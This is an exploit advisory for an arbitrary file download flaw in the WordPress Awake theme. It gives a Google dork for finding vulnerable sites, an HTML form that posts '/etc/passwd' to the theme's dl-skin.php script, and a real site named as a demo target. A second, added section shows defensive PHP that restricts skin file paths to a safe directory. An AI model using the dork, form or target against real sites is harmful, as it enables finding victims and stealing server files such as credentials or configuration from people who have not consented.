
WordPress Awake Theme Arbitrary File Download Vulnerability

Author: Aloulou, Published: 23-06-2014
############################################################################

# Title : WordPress Awake Theme Arbitrary File Download Vulnerability

# Author : Aloulou

# Date : 19/06/2014

# Facebook : http://www.facebook.com/Aloulou.TN

# Email: aloulou@alquds.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/themes/awake

# Tested on : Linux



############################################################################



Exploit:

<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/awake/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value="Download">
</form>
</body>
</html>





Demo:http://www.hirondelle37.fr

# Greeting to : Tunisia , CyberPink , AnonBoy and All muslims
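
A defensive counterpart to the form above, added here as an example (it is not the Awake theme's code or the author's): a handler that takes a file name from a POST field such as `_mysite_download_skin` should accept only a bare skin name and confirm that the resolved path stays inside the skins directory. The function name, the temporary skins directory, the `.css`-only rule and the sample names are assumptions.

```php
<?php
// Added example, not the theme's code. The skins directory, the ".css"-only
// rule and the sample file names below are assumptions made for illustration.

/**
 * Map a client-supplied skin name to a file inside $baseDir.
 * Returns the resolved path, or null when the request must be refused.
 */
function resolve_skin_path(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // misconfigured base directory: fail closed
    }
    // Allowlist the shape of the name: no slashes, no dots except the
    // extension, no NUL bytes. "/etc/passwd" and "../x" fail here.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.css\z/', $requested)) {
        return null;
    }
    // Resolve symlinks, then confirm the result is still under the base.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: a temporary skins directory with one legitimate file.
$skins = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'skins_' . bin2hex(random_bytes(4));
mkdir($skins, 0700);
file_put_contents($skins . DIRECTORY_SEPARATOR . 'dark.css', "body{}\n");

foreach (['dark.css', '/etc/passwd', '../../wp-config.php', 'dark.css/../..'] as $name) {
    $path = resolve_skin_path($name, $skins);
    printf("%-22s => %s\n", $name, $path === null ? 'refused' : 'served from ' . $path);
}

unlink($skins . DIRECTORY_SEPARATOR . 'dark.css');
rmdir($skins);
```

Path validation is one layer; a download endpoint of this kind should also require an authenticated, authorised user before it reads any file.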
